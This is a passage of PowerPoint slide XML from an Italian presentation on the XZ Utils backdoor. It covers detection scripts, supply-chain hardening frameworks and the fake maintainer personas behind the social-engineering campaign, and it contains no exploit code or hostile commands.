            <a:ext cx="6096000" cy="239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840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Forme di mitigazione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93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distro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-backdoor-scanner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Controllo pacchetti sorgente</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>package_unpack_all.sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> estrae tutti i package della repository;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. package_scan_all.sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ricerca sintomi di una backdoor;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Organizza macro m4 in un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQLite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> database per distinguere quali sono i "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>known</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> good" e quali da controllare.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>populate_m4_db.sh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>find_m4.sh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Confronto dell'output di decompressione</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Package_decompcheck_all.sh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>compara decompressione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> con l'output di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xz-utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> con backdoor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13718561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Forme di mitigazione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94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 err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hardening</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> della supply chain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it-IT" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>backseat-signed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: autentica la catena di custodia delle distribuzioni Linux ai loro codici sorgente, attraverso link crittografici.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg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SLSA (Supply-Chain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Levels</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> For Software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Artifacts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>): framework di sicurezza open-source, fondato nel 2021 in risposta a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SolarWinds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> per fortificare il Software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Developement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Life </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cycle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, prevenire il tampering e garantire integrità.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15138593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Forme di mitigazione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95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Secure-by-design</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Un approccio alla progettazione che fa della sicurezza la base.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A seguito del crescente numero di cyber attacchi alle supply chain, istituzioni come la CISA (l'agenzia per la cybersicurezza americana) stanno portando avanti campagne di sensibilizzazione ed esercitazioni volte a potenziare le capacità di risposta e coordinamento di sviluppatori e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>maintainer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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58064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12832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 sommario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96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2A27160-7963-656C-9FB1-68F8080C23CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198904" y="1792941"/>
            <a:ext cx="863413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Introduzione</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRP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La scoperta di Andres Freund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La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Jia</a:t>
            </a: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 Tan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Struttura della backdoor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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Forme di mitigazione</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/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2800" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Cosa sappiamo oggi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="378871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Cosa sappiamo oggi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97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rgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Singaporean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> guy, an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Indian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> guy, and a German guy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>walk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>into</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a bar…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D1D1B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Secondo un analisi di Kaspersky, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>benchè</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tan, Dennis Ens, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jigar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Kumar siano in teoria persone diverse, seguono tutte e tre lo stesso schema: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rgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>un account GitHub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rgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tre mail ciascuno, con tre nickname piuttosto simili ("jiat75", "jiatan018", "JiaT75")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rgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>un account IRC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rgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Un account Ubuntu One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rgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scrivono sulla mailing list di XZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Utils</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D1D1B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rgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scrivono sui downstream (ad es. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill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rgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scrivono codice simile</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Compiono gli stessi errori grammaticali</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13864653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Cosa sappiamo oggi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98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rgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hans Jansen?</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D1D1B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hans Jansen compare tre volte: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rgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>22 Giugno 2023 sottopone delle patch che vengono prima accettate e poi revocate da Lasse Collin. Vengono successivamente accettate da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tan. Queste patch, riguardanti IFUNC, contribuiscono all'hook per la backdoor;</a:t>
            </a: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solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>25 Marzo 2024: Hans Jansen invia la segnalazione di un bug a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, chiedendo che </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xz-utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> venga aggiornata a 5.6.1.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D1D1B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Anche questo profilo non trova riscontri rilevanti nell'internet. Tuttavia, non ha comportamenti sociali rilevanti, ma si limita solo al ruolo di sviluppatore.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="188041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FF39-6F5A-1E50-7CDE-8AAD21C2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67" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0"/>
              <a:t> Cosa sappiamo oggi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698C9B-A4EA-4166-BB4E-5F2D0E1F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F03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>26/05/2024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864F53-019D-926A-DB74-BA373E3F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DB1B8-299C-899A-BCC9-0785B18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99</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C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3" y="7285"/>
            <a:ext cx="1676961" cy="145340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84BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11853204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rgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Indagini OSSF</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D1D1B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> non sembra un caso isolato. La Open Source Security Foundation ha emanato un avviso in merito ad indagini su altri incidenti social-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>driven</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> di questo tipo, come nel caso della </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OpenJS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Foundation, dove altri attori volevano che </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OpenJS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> li designasse come </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>maintainer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, seguendo pattern comportamentali simili a quelli di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tan.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Altri due progetti </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> hanno segnalato pattern di questo tipo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D1D1B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Questi attacchi di social engineering fanno leva sul senso di dovere del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>maintainer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lasse Collin ha detto una frase che può riassumere il peso di essere un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>maintainer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D1D1B"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
